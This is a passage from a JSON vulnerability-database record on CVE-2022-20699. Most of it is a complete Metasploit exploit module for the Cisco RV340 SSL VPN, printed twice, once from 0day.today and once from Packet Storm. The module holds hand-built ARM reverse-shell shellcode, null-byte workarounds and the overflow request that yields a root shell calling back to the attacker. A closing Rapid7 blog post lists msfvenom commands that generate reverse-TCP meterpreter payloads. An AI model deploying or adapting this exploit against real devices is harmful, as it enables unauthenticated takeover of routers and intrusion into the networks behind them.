at\n # The remaining 35% will land at 0x704f6d98, causing this sploit will fail.\n # There's no way to guess it, but the service will restart again, so let's stick\n # with the most common stack address.\n 'Shellcode' => \"\\x99\\xed\\x4a\\x70\"\n }\n ],\n ],\n 'DisclosureDate' => '2022-02-02',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => CRASH_SERVICE_RESTARTS,\n # repeatable... 
but only works 65% of the time, see comments above\n 'Reliability' => REPEATABLE_SESSION,\n 'SideEffects' => nil\n }\n )\n )\n register_options(\n [\n Opt::RPORT(8443),\n OptBool.new('SSL', [true, 'Use SSL', true])\n ]\n )\n end\n\n def check\n # This should return a string like:\n # \"The Cisco AnyConnect VPN Client is required to connect to the SSLVPN server.\" (plus another phrase)\n res = send_request_cgi({ 'uri' => '/login.html' })\n if res && res.code == 200 && res.body.include?('The Cisco AnyConnect VPN Client is required to connect to the SSLVPN server')\n Exploit::CheckCode::Detected\n else\n Exploit::CheckCode::Unknown\n end\n end\n\n def hex_to_bin(int)\n hex = int.to_s(16)\n if (hex.length == 1) || (hex.length == 3)\n hex = '0' + hex\n end\n hex.scan(/../).map { |x| x.hex.chr }.join\n end\n\n def prep_shelly\n # We need to roll our own shellcode, as Metasploit doesn't have encoders for ARMLE.\n # A null free shellcode is needed, as this memory corruption is done through `strcat()`\n #\n # SHELLCODE_START:\n # // Original shellcode from Azeria's blog\n # // Expanded and Improved by the Flashback Team\n # .global _start\n # _start:\n # .THUMB\n # // socket(2, 1, 0)\n # mov r0, #2\n # mov r1, #1\n # sub r2, r2\n # mov r7, #200\n # add r7, #81 // r7 = 281 (socket)\n # svc #1 // r0 = resultant sockfd\n # mov r4, r0 // save sockfd in r4\n #\n # // connect(r0, &sockaddr, 16)\n # adr r1, struct // pointer to address, port\n # strb r2, [r1, #1] // write 0 for AF_INET\n # mov r2, #16\n # add r7, #2 // r7 = 283 (connect)\n # svc #1\n #\n # // dup2(sockfd, 0)\n # mov r7, #63 // r7 = 63 (dup2)\n # mov r0, r4 // r4 is the saved sockfd\n # sub r1, r1 // r1 = 0 (stdin)\n # svc #1\n # // dup2(sockfd, 1)\n # mov r0, r4 // r4 is the saved sockfd\n # mov r1, #1 // r1 = 1 (stdout)\n # svc #1\n # // dup2(sockfd, 2)\n # mov r0, r4 // r4 is the saved sockfd\n # mov r1, #2 // r1 = 2 (stderr)\n # svc #1\n #\n # // execve(\"/bin/sh\", 0, 0)\n # adr r0, binsh\n # sub r2, r2\n # 
sub r1, r1\n # strb r2, [r0, #7]\n # push {r0, r2}\n # mov r1, sp\n # cpy r2, r1\n # mov r7, #11 // r7 = 11 (execve)\n # svc #1\n #\n # eor r7, r7, r7\n #\n # struct:\n # .ascii \"\\x02\\xff\" // AF_INET 0xff will be NULLed\n # .ascii \"\\x11\\x5d\" // port number 4445\n # .byte 5,5,5,1 // IP Address\n # binsh:\n # .ascii \"/bin/shX\"\n # SHELLCODE_END\n #\n # Since we need to be null free, we have a very specific corner case, for addresses:\n # X.0.Y.Z\n # X.Y.0.Z\n # X.Y.Z.0\n # X.0.0.Y\n # X.Y.0.0\n # X.0.Y.0\n # X.0.0.0\n # These will contain a null byte for the each zero in the address.\n #\n # To fix this we add additional instructions to the shellcode and replace the null byte(s).\n # adr r1, struct // pointer to address, port\n # strb r2, [r1, #5] // write 0 for X.0.Y.Z (second octet)\n # adr r1, struct // pointer to address, port\n # strb r2, [r1, #6] // write 0 for X.Y.0.Z (third octet)\n # adr r1, struct // pointer to address, port\n # strb r2, [r1, #7] // write 0 for X.Y.Z.0 (last octet)\n #\n\n # The following is used to convert LHOST and LPORT for shellcode inclusion\n lport_h = hex_to_bin(lport)\n lhost_h = ''\n jump = 0xc\n datastore['LHOST'].split('.').each do |n|\n octet = hex_to_bin(n.to_i)\n if octet == \"\\x00\"\n # Why we do this? Check comments below my fren\n jump += 1\n end\n lhost_h += octet\n end\n lhost_h = lhost_h.force_encoding('binary')\n\n # As part of the shellcode, we need to do:\n # adr r1, struct // pointer to address, port\n # strb r2, [r1, #1] // write 0 for AF_INET\n #\n # In order to do the \"adr\", we need to know where \"struct\" is. 
On an unmodified\n # shellcode, this is \"\\x0c\\xa1\\x4a\\x70\".\n # But if we have one or more null bytes in the LHOST, we need to add more instructions.\n # This means the \"\\x0c\", the distance from $pc to \"struct, is going to be either\n # \"\\x0d, \"\\x0e\" or \"\\x0f\".\n # Long story short, this distance is the jump variable, and we need to calculate it\n # properly the more instructions we add.\n #\n # This is our jump, now calculated with the additional (or not) instructions:\n ins = hex_to_bin(jump) + \"\\xa1\\x4a\\x70\"\n jump -= 1\n\n # And now we calculate all the null bytes we have, replace them with \\xff and add\n # the proper jump:\n for i in 1..3 do\n next unless lhost_h[i] == \"\\x00\"\n\n ins_add = ''\n lhost_h[i] = \"\\xff\"\n if i == 1\n # strb r2, [r1, #5] // write 0 for X.0.Y.Z (second octet)\n ins_add = \"\\x4a\\x71\"\n elsif i == 2\n # strb r2, [r1, #6] // write 0 for X.Y.0.Z (third octet)\n ins_add = \"\\x8a\\x71\"\n elsif i == 3\n # strb r2, [r1, #7] // write 0 for X.Y.Z.0 (last octet)\n ins_add = \"\\xca\\x71\"\n end\n ins += hex_to_bin(jump) + \"\\xa1\" + ins_add\n jump -= 1\n end\n ins = ins.force_encoding('binary')\n\n shellcode = \"\\x02\\x20\\x01\\x21\\x92\\x1a\\xc8\\x27\\x51\\x37\\x01\\xdf\\x04\\x1c\" + ins +\n \"\\x10\\x22\\x02\\x37\\x01\\xdf\\x3f\\x27\\x20\\x1c\\x49\\x1a\\x01\\xdf\\x20\\x1c\\x01\\x21\" \\\n \"\\x01\\xdf\\x20\\x1c\\x02\\x21\\x01\\xdf\\x06\\xa0\\x92\\x1a\\x49\\x1a\\xc2\\x71\\x05\\xb4\" \\\n \"\\x69\\x46\\x0a\\x46\\x0b\\x27\\x01\\xdf\\x7f\\x40\\x02\\xff\" + lport_h + lhost_h +\n \"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58\"\n shelly = shellcode + rand_text_alphanumeric(16400 - shellcode.length) + target['Shellcode']\n shelly\n end\n\n def sock_get(app_host, app_port)\n begin\n ctx = { 'Msf' => framework, 'MsfExploit' => self }\n sock = Rex::Socket.create_tcp(\n { 'PeerHost' => app_host, 'PeerPort' => app_port, 'Context' => ctx, 'Timeout' => 10 }\n )\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, 
Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n sock.close if sock\n end\n if sock.nil?\n fail_with(Failure::Unknown, 'Failed to connect to the chosen application')\n end\n\n # also need to add support for old ciphers\n ctx = OpenSSL::SSL::SSLContext.new\n ctx.min_version = OpenSSL::SSL::SSL3_VERSION\n ctx.security_level = 0\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n s = OpenSSL::SSL::SSLSocket.new(sock, ctx)\n s.sync_close = true\n s.connect\n return s\n end\n\n def exploit\n print_status(\"#{peer} - Pwning #{target.name}\")\n payload = prep_shelly\n begin\n sock = sock_get(rhost, rport)\n # With the base request, our shellcode will be about 0x12a from $sp when we take control.\n #\n # But we noticed that by adding more filler in the request we can have better reliability.\n # So let's use 0x86 as filler and dump the filler in the URL! This number is arbitrary and\n # can be increased / decreased, but we find 0x86 works well.\n # (this means our shellcode address in the target definition above is $sp + 0x12a + 0x86)\n #\n # It would be good to add some valid headers with semi random data for proper evasion :D\n http = 'POST /' + rand_text_alphanumeric(0x86) + \" HTTP/1.1\\r\\nContent-Length: 16404\\r\\n\\r\\n\"\n\n sock.write(http)\n sock.write(payload)\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the router\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37729", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-05-11T17:26:30", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T00:00:00", "type": "packetstorm", "title": "Cisco RV340 SSL VPN Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-05-11T00:00:00", "id": "PACKETSTORM:167113", "href": "https://packetstormsecurity.com/files/167113/Cisco-RV340-SSL-VPN-Unauthenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco RV340 SSL VPN Unauthenticated Remote Code Execution', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in the Cisco RV series routers SSL VPN \nfunctionality. The default SSL VPN configuration is exploitable, with no authentication \nrequired and works over the Internet! \nThe stack is executable and no ASLR is in place, which makes exploitation easier. \nSuccessful execution of this module results in a reverse root shell. A custom payload is \nused as Metasploit does not have ARMLE null free shellcode. 
\nThis vulnerability was presented by the Flashback Team in Pwn2Own Austin 2021 and OffensiveCon \n2022. For more information check the referenced advisory. \nThis module has been tested in firmware versions 1.0.03.15 and above and works with around \n65% reliability. The service restarts automatically so you can keep trying until you pwn it. \nOnly the RV340 router was tested, but other RV series routers should work out of the box. \n}, \n'Author' => [ \n'Pedro Ribeiro <pedrib@gmail.com>', # Vulnerability discovery and Metasploit module \n'Radek Domanski <radek.domanski[at]gmail.com>' # Vulnerability discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'References' => [ \n['CVE', '2022-20699'], \n['URL', 'https://www.youtube.com/watch?v=O1uK_b1Tmts'], \n['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Austin_2021/flashback_connects/flashback_connects.md'], \n['URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Austin2021/flashback_connects/flashback_connects.md'], \n['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-smb-mult-vuln-KA9PK6D.html'], \n], \n'Arch' => ARCH_ARMLE, \n# We actually use our own shellcode because Metasploit doesn't have ARM encoders! \n'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' }, \n'Targets' => [ \n[ \n'Cisco RV340 Firmware Version <= 1.0.03.24', \n{ \n# Shellcode location on stack (rwx stack, seriously Cisco...) \n# The same for all vulnerable firmware versions: 0x704aed98 (+ 1 for thumb) \n# \n# NOTE: this is the shellcode location about 65% of the time. The rest is at \n# The remaining 35% will land at 0x704f6d98, causing this sploit will fail. \n# There's no way to guess it, but the service will restart again, so let's stick \n# with the most common stack address. 
\n'Shellcode' => \"\\x99\\xed\\x4a\\x70\" \n} \n], \n], \n'DisclosureDate' => '2022-02-02', \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => CRASH_SERVICE_RESTARTS, \n# repeatable... but only works 65% of the time, see comments above \n'Reliability' => REPEATABLE_SESSION, \n'SideEffects' => nil \n} \n) \n) \nregister_options( \n[ \nOpt::RPORT(8443), \nOptBool.new('SSL', [true, 'Use SSL', true]) \n] \n) \nend \n \ndef check \n# This should return a string like: \n# \"The Cisco AnyConnect VPN Client is required to connect to the SSLVPN server.\" (plus another phrase) \nres = send_request_cgi({ 'uri' => '/login.html' }) \nif res && res.code == 200 && res.body.include?('The Cisco AnyConnect VPN Client is required to connect to the SSLVPN server') \nExploit::CheckCode::Detected \nelse \nExploit::CheckCode::Unknown \nend \nend \n \ndef hex_to_bin(int) \nhex = int.to_s(16) \nif (hex.length == 1) || (hex.length == 3) \nhex = '0' + hex \nend \nhex.scan(/../).map { |x| x.hex.chr }.join \nend \n \ndef prep_shelly \n# We need to roll our own shellcode, as Metasploit doesn't have encoders for ARMLE. 
\n# A null free shellcode is needed, as this memory corruption is done through `strcat()` \n# \n# SHELLCODE_START: \n# // Original shellcode from Azeria's blog \n# // Expanded and Improved by the Flashback Team \n# .global _start \n# _start: \n# .THUMB \n# // socket(2, 1, 0) \n# mov r0, #2 \n# mov r1, #1 \n# sub r2, r2 \n# mov r7, #200 \n# add r7, #81 // r7 = 281 (socket) \n# svc #1 // r0 = resultant sockfd \n# mov r4, r0 // save sockfd in r4 \n# \n# // connect(r0, &sockaddr, 16) \n# adr r1, struct // pointer to address, port \n# strb r2, [r1, #1] // write 0 for AF_INET \n# mov r2, #16 \n# add r7, #2 // r7 = 283 (connect) \n# svc #1 \n# \n# // dup2(sockfd, 0) \n# mov r7, #63 // r7 = 63 (dup2) \n# mov r0, r4 // r4 is the saved sockfd \n# sub r1, r1 // r1 = 0 (stdin) \n# svc #1 \n# // dup2(sockfd, 1) \n# mov r0, r4 // r4 is the saved sockfd \n# mov r1, #1 // r1 = 1 (stdout) \n# svc #1 \n# // dup2(sockfd, 2) \n# mov r0, r4 // r4 is the saved sockfd \n# mov r1, #2 // r1 = 2 (stderr) \n# svc #1 \n# \n# // execve(\"/bin/sh\", 0, 0) \n# adr r0, binsh \n# sub r2, r2 \n# sub r1, r1 \n# strb r2, [r0, #7] \n# push {r0, r2} \n# mov r1, sp \n# cpy r2, r1 \n# mov r7, #11 // r7 = 11 (execve) \n# svc #1 \n# \n# eor r7, r7, r7 \n# \n# struct: \n# .ascii \"\\x02\\xff\" // AF_INET 0xff will be NULLed \n# .ascii \"\\x11\\x5d\" // port number 4445 \n# .byte 5,5,5,1 // IP Address \n# binsh: \n# .ascii \"/bin/shX\" \n# SHELLCODE_END \n# \n# Since we need to be null free, we have a very specific corner case, for addresses: \n# X.0.Y.Z \n# X.Y.0.Z \n# X.Y.Z.0 \n# X.0.0.Y \n# X.Y.0.0 \n# X.0.Y.0 \n# X.0.0.0 \n# These will contain a null byte for the each zero in the address. \n# \n# To fix this we add additional instructions to the shellcode and replace the null byte(s). 
\n# adr r1, struct // pointer to address, port \n# strb r2, [r1, #5] // write 0 for X.0.Y.Z (second octet) \n# adr r1, struct // pointer to address, port \n# strb r2, [r1, #6] // write 0 for X.Y.0.Z (third octet) \n# adr r1, struct // pointer to address, port \n# strb r2, [r1, #7] // write 0 for X.Y.Z.0 (last octet) \n# \n \n# The following is used to convert LHOST and LPORT for shellcode inclusion \nlport_h = hex_to_bin(lport) \nlhost_h = '' \njump = 0xc \ndatastore['LHOST'].split('.').each do |n| \noctet = hex_to_bin(n.to_i) \nif octet == \"\\x00\" \n# Why we do this? Check comments below my fren \njump += 1 \nend \nlhost_h += octet \nend \nlhost_h = lhost_h.force_encoding('binary') \n \n# As part of the shellcode, we need to do: \n# adr r1, struct // pointer to address, port \n# strb r2, [r1, #1] // write 0 for AF_INET \n# \n# In order to do the \"adr\", we need to know where \"struct\" is. On an unmodified \n# shellcode, this is \"\\x0c\\xa1\\x4a\\x70\". \n# But if we have one or more null bytes in the LHOST, we need to add more instructions. \n# This means the \"\\x0c\", the distance from $pc to \"struct, is going to be either \n# \"\\x0d, \"\\x0e\" or \"\\x0f\". \n# Long story short, this distance is the jump variable, and we need to calculate it \n# properly the more instructions we add. 
\n# \n# This is our jump, now calculated with the additional (or not) instructions: \nins = hex_to_bin(jump) + \"\\xa1\\x4a\\x70\" \njump -= 1 \n \n# And now we calculate all the null bytes we have, replace them with \\xff and add \n# the proper jump: \nfor i in 1..3 do \nnext unless lhost_h[i] == \"\\x00\" \n \nins_add = '' \nlhost_h[i] = \"\\xff\" \nif i == 1 \n# strb r2, [r1, #5] // write 0 for X.0.Y.Z (second octet) \nins_add = \"\\x4a\\x71\" \nelsif i == 2 \n# strb r2, [r1, #6] // write 0 for X.Y.0.Z (third octet) \nins_add = \"\\x8a\\x71\" \nelsif i == 3 \n# strb r2, [r1, #7] // write 0 for X.Y.Z.0 (last octet) \nins_add = \"\\xca\\x71\" \nend \nins += hex_to_bin(jump) + \"\\xa1\" + ins_add \njump -= 1 \nend \nins = ins.force_encoding('binary') \n \nshellcode = \"\\x02\\x20\\x01\\x21\\x92\\x1a\\xc8\\x27\\x51\\x37\\x01\\xdf\\x04\\x1c\" + ins + \n\"\\x10\\x22\\x02\\x37\\x01\\xdf\\x3f\\x27\\x20\\x1c\\x49\\x1a\\x01\\xdf\\x20\\x1c\\x01\\x21\" \\ \n\"\\x01\\xdf\\x20\\x1c\\x02\\x21\\x01\\xdf\\x06\\xa0\\x92\\x1a\\x49\\x1a\\xc2\\x71\\x05\\xb4\" \\ \n\"\\x69\\x46\\x0a\\x46\\x0b\\x27\\x01\\xdf\\x7f\\x40\\x02\\xff\" + lport_h + lhost_h + \n\"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58\" \nshelly = shellcode + rand_text_alphanumeric(16400 - shellcode.length) + target['Shellcode'] \nshelly \nend \n \ndef sock_get(app_host, app_port) \nbegin \nctx = { 'Msf' => framework, 'MsfExploit' => self } \nsock = Rex::Socket.create_tcp( \n{ 'PeerHost' => app_host, 'PeerPort' => app_port, 'Context' => ctx, 'Timeout' => 10 } \n) \nrescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError \nsock.close if sock \nend \nif sock.nil? 
\nfail_with(Failure::Unknown, 'Failed to connect to the chosen application') \nend \n \n# also need to add support for old ciphers \nctx = OpenSSL::SSL::SSLContext.new \nctx.min_version = OpenSSL::SSL::SSL3_VERSION \nctx.security_level = 0 \nctx.verify_mode = OpenSSL::SSL::VERIFY_NONE \ns = OpenSSL::SSL::SSLSocket.new(sock, ctx) \ns.sync_close = true \ns.connect \nreturn s \nend \n \ndef exploit \nprint_status(\"#{peer} - Pwning #{target.name}\") \npayload = prep_shelly \nbegin \nsock = sock_get(rhost, rport) \n# With the base request, our shellcode will be about 0x12a from $sp when we take control. \n# \n# But we noticed that by adding more filler in the request we can have better reliability. \n# So let's use 0x86 as filler and dump the filler in the URL! This number is arbitrary and \n# can be increased / decreased, but we find 0x86 works well. \n# (this means our shellcode address in the target definition above is $sp + 0x12a + 0x86) \n# \n# It would be good to add some valid headers with semi random data for proper evasion :D \nhttp = 'POST /' + rand_text_alphanumeric(0x86) + \" HTTP/1.1\\r\\nContent-Length: 16404\\r\\n\\r\\n\" \n \nsock.write(http) \nsock.write(payload) \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the router\") \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167113/cisco_rv340_sslvpn.rb.txt"}], "rapid7blog": [{"lastseen": "2022-05-13T17:31:10", "description": "## Spring4Shell module\n\n\n\nCommunity contributor [vleminator](<https://github.com/vleminator>) added [a new module](<https://github.com/rapid7/metasploit-framework/pull/16423>) which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>)\u2014more commonly known as "Spring4Shell." 
[Depending on its deployment configuration](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965/rapid7-analysis?referrer=blog>), Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.\n\n## F5 BIG-IP iControl RCE via REST Authentication Bypass module\n\nIn addition, we have [a new module](<https://github.com/rapid7/metasploit-framework/pull/16549>) that targets F5 iControl and exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>), from contributor [heyder](<https://github.com/heyder>). This vulnerability allows attackers to bypass iControl's REST authentication on [affected versions](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388/rapid7-analysis?referrer=blog>) and achieve unauthenticated remote code execution as `root` via the `/mgmt/tm/util/bash` endpoint.\n\n## Cisco RV340 SSL VPN RCE module\n\nThe last of the new RCE modules this week\u2014community contributor [pedrib](<https://github.com/pedrib>) added [a Cisco RV340 SSL VPN module](<https://github.com/rapid7/metasploit-framework/pull/16169>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>). This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.\n\n## First Class PowerShell Command Payloads\n\nMetasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. 
Now module authors can just define the standard command target, and users can select one of the new `cmd/windows/powershell*` payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.\n\nSince these are new payload modules, they can also be generated directly using MSFVenom:\n \n \n ./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128\n \n\nThis is similar to using one of the `psh-` formatters with the existing `-f` option. However, because it\u2019s a payload module, the additional [Powershell specific options](<https://github.com/rapid7/metasploit-framework/blob/93a7ae26a1e85f82de8647460a0c245bf95e6b00/lib/msf/core/exploit/powershell.rb#L10>) are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting `Powershell::encode_final_payload=true`.\n\n## New module content (4)\n\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>) \\- A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. 
This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [Cisco RV340 SSL VPN RCE](<https://github.com/rapid7/metasploit-framework/pull/16169>) from [pedrib](<https://github.com/pedrib>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>) \\- A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the `root` user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.\n * [Spring Framework Class property RCE (Spring4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16423>) by [vleminator](<https://github.com/vleminator>), which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>) \\- This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a `war` file, though it may be possible to bypass these limitations later.\n * [Powershell Command Adapter](<https://github.com/rapid7/metasploit-framework/pull/16548>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using Powershell.\n\n## Enhancements and features (4)\n\n * [#16529](<https://github.com/rapid7/metasploit-framework/pull/16529>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. 
For example within msfconsole:\n \n \n use osx/x64/meterpreter_reverse_tcp\n generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'\n to_handler\n \n\n * [#16538](<https://github.com/rapid7/metasploit-framework/pull/16538>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.\n * [#16551](<https://github.com/rapid7/metasploit-framework/pull/16551>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.\n * [#16553](<https://github.com/rapid7/metasploit-framework/pull/16553>) from [mauvehed](<https://github.com/mauvehed>) \\- This updates Metasploit's `.github/SECURITY.md` file with the latest steps to follow when raising security issues with Rapid7's open source projects.\n\n## Bugs fixed (8)\n\n * [#16485](<https://github.com/rapid7/metasploit-framework/pull/16485>) from [jeffmcjunkin](<https://github.com/jeffmcjunkin>) \\- This updates the version check for the `exploit/windows/local/s4u_persistence` module to allow it to run on later Windows versions.\n * [#16491](<https://github.com/rapid7/metasploit-framework/pull/16491>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.\n * [#16531](<https://github.com/rapid7/metasploit-framework/pull/16531>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash in various pihole modules when login authentication is required.\n * [#16533](<https://github.com/rapid7/metasploit-framework/pull/16533>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \\- This updates the 
Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with `-w 32` or `-w 64` \\- previously these flag values were unintentionally ignored.\n * [#16540](<https://github.com/rapid7/metasploit-framework/pull/16540>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes an issue with Zeitwerk trying to load Go packages as part of the boot-up process.\n * [#16542](<https://github.com/rapid7/metasploit-framework/pull/16542>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This fixes a bug in msfconsole's internal bookkeeping to ensure that closed channels are no longer tracked.\n * [#16544](<https://github.com/rapid7/metasploit-framework/pull/16544>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates post module `windows/gather/ad_to_sqlite` to no longer crash. The module will now additionally store the extracted information as loot.\n * [#16560](<https://github.com/rapid7/metasploit-framework/pull/16560>) from [Ronni3X](<https://github.com/Ronni3X>) \\- This updates the `nessus_connect` login functionality to correctly handle the `@` symbol being present in the password.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-05-05T11%3A16%3A04-05%3A00..2022-05-12T07%3A30%3A04-05%3A00%22>)\n * [Full diff 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/compare/6.1.41...6.1.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T16:52:59", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-20699", "CVE-2022-22965"], "modified": "2022-05-13T16:52:59", "id": "RAPID7BLOG:1C4EBCEAFC7E54954F827CAEDB3291DA", "href": "https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}